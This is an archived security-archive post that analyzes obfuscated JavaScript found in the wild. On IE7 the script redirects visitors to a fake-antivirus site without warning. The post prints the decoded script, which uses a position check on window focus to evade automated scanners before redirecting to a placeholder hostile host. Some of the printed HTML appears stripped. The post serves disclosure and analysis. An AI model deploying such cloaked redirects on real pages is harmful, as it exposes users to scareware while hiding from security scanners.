Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Browsers :: bt-21461.htm

IE7 Script



IE7 Script
IE7 Script



Code found in the wild opens and renders hostile fakeav page on another
site without warning on fully updated IE7 on XP SP2 or XP SP3 32-bit
with current patches. Under IE8, user gets a warning before the hostile
site gets rendered. No warning under IE7. AV also failed to catch the
secondary hostile page until after rendering was complete. AV client
involved was outdated engine with current definitions, and not worth
maligning. Not tested with modern AV.

Not sure what if anything is new about this, but the obfuscation and the
client behavior suggest something of interest. The point seems to be to
render known bad code from a page that robot testers will find to be
clean, and possibly to bypass AV auto-protection.

The exploit was obfuscated javascript. VirusTotal had no complaints
about the script below, whether obfuscated or not.

Here is the script wrapper. I changed script to sXXcript.


document.write( unescape( 'hex for the code below' ) );


Nothing at all interesting about the wrapper that I see.

Here is the unescaped child script. I changed the target site name,
which was a different domain from the one where this script was found.



document.write('
'); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write(''); document.write('
This is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good site
This is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good siteThis is good site
'); document.write('
'); var D=document; function AbsPos(O, Parent){ var X=0, Y=0, Next, D=document; Next=O; if (Parent==null) Parent=D; while (Next!=null && Next!==Parent){ Y+=Next.offsetTop; X+=Next.offsetLeft; Next=Next.offsetParent; } return [X, Y]; } window.onfocus = function() { var first = AbsPos(D.getElementById('first')); var second = AbsPos(D.getElementById('second')); if (first[0] != second[0]) { document.location.href = "http://badsite.bad"; } }


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH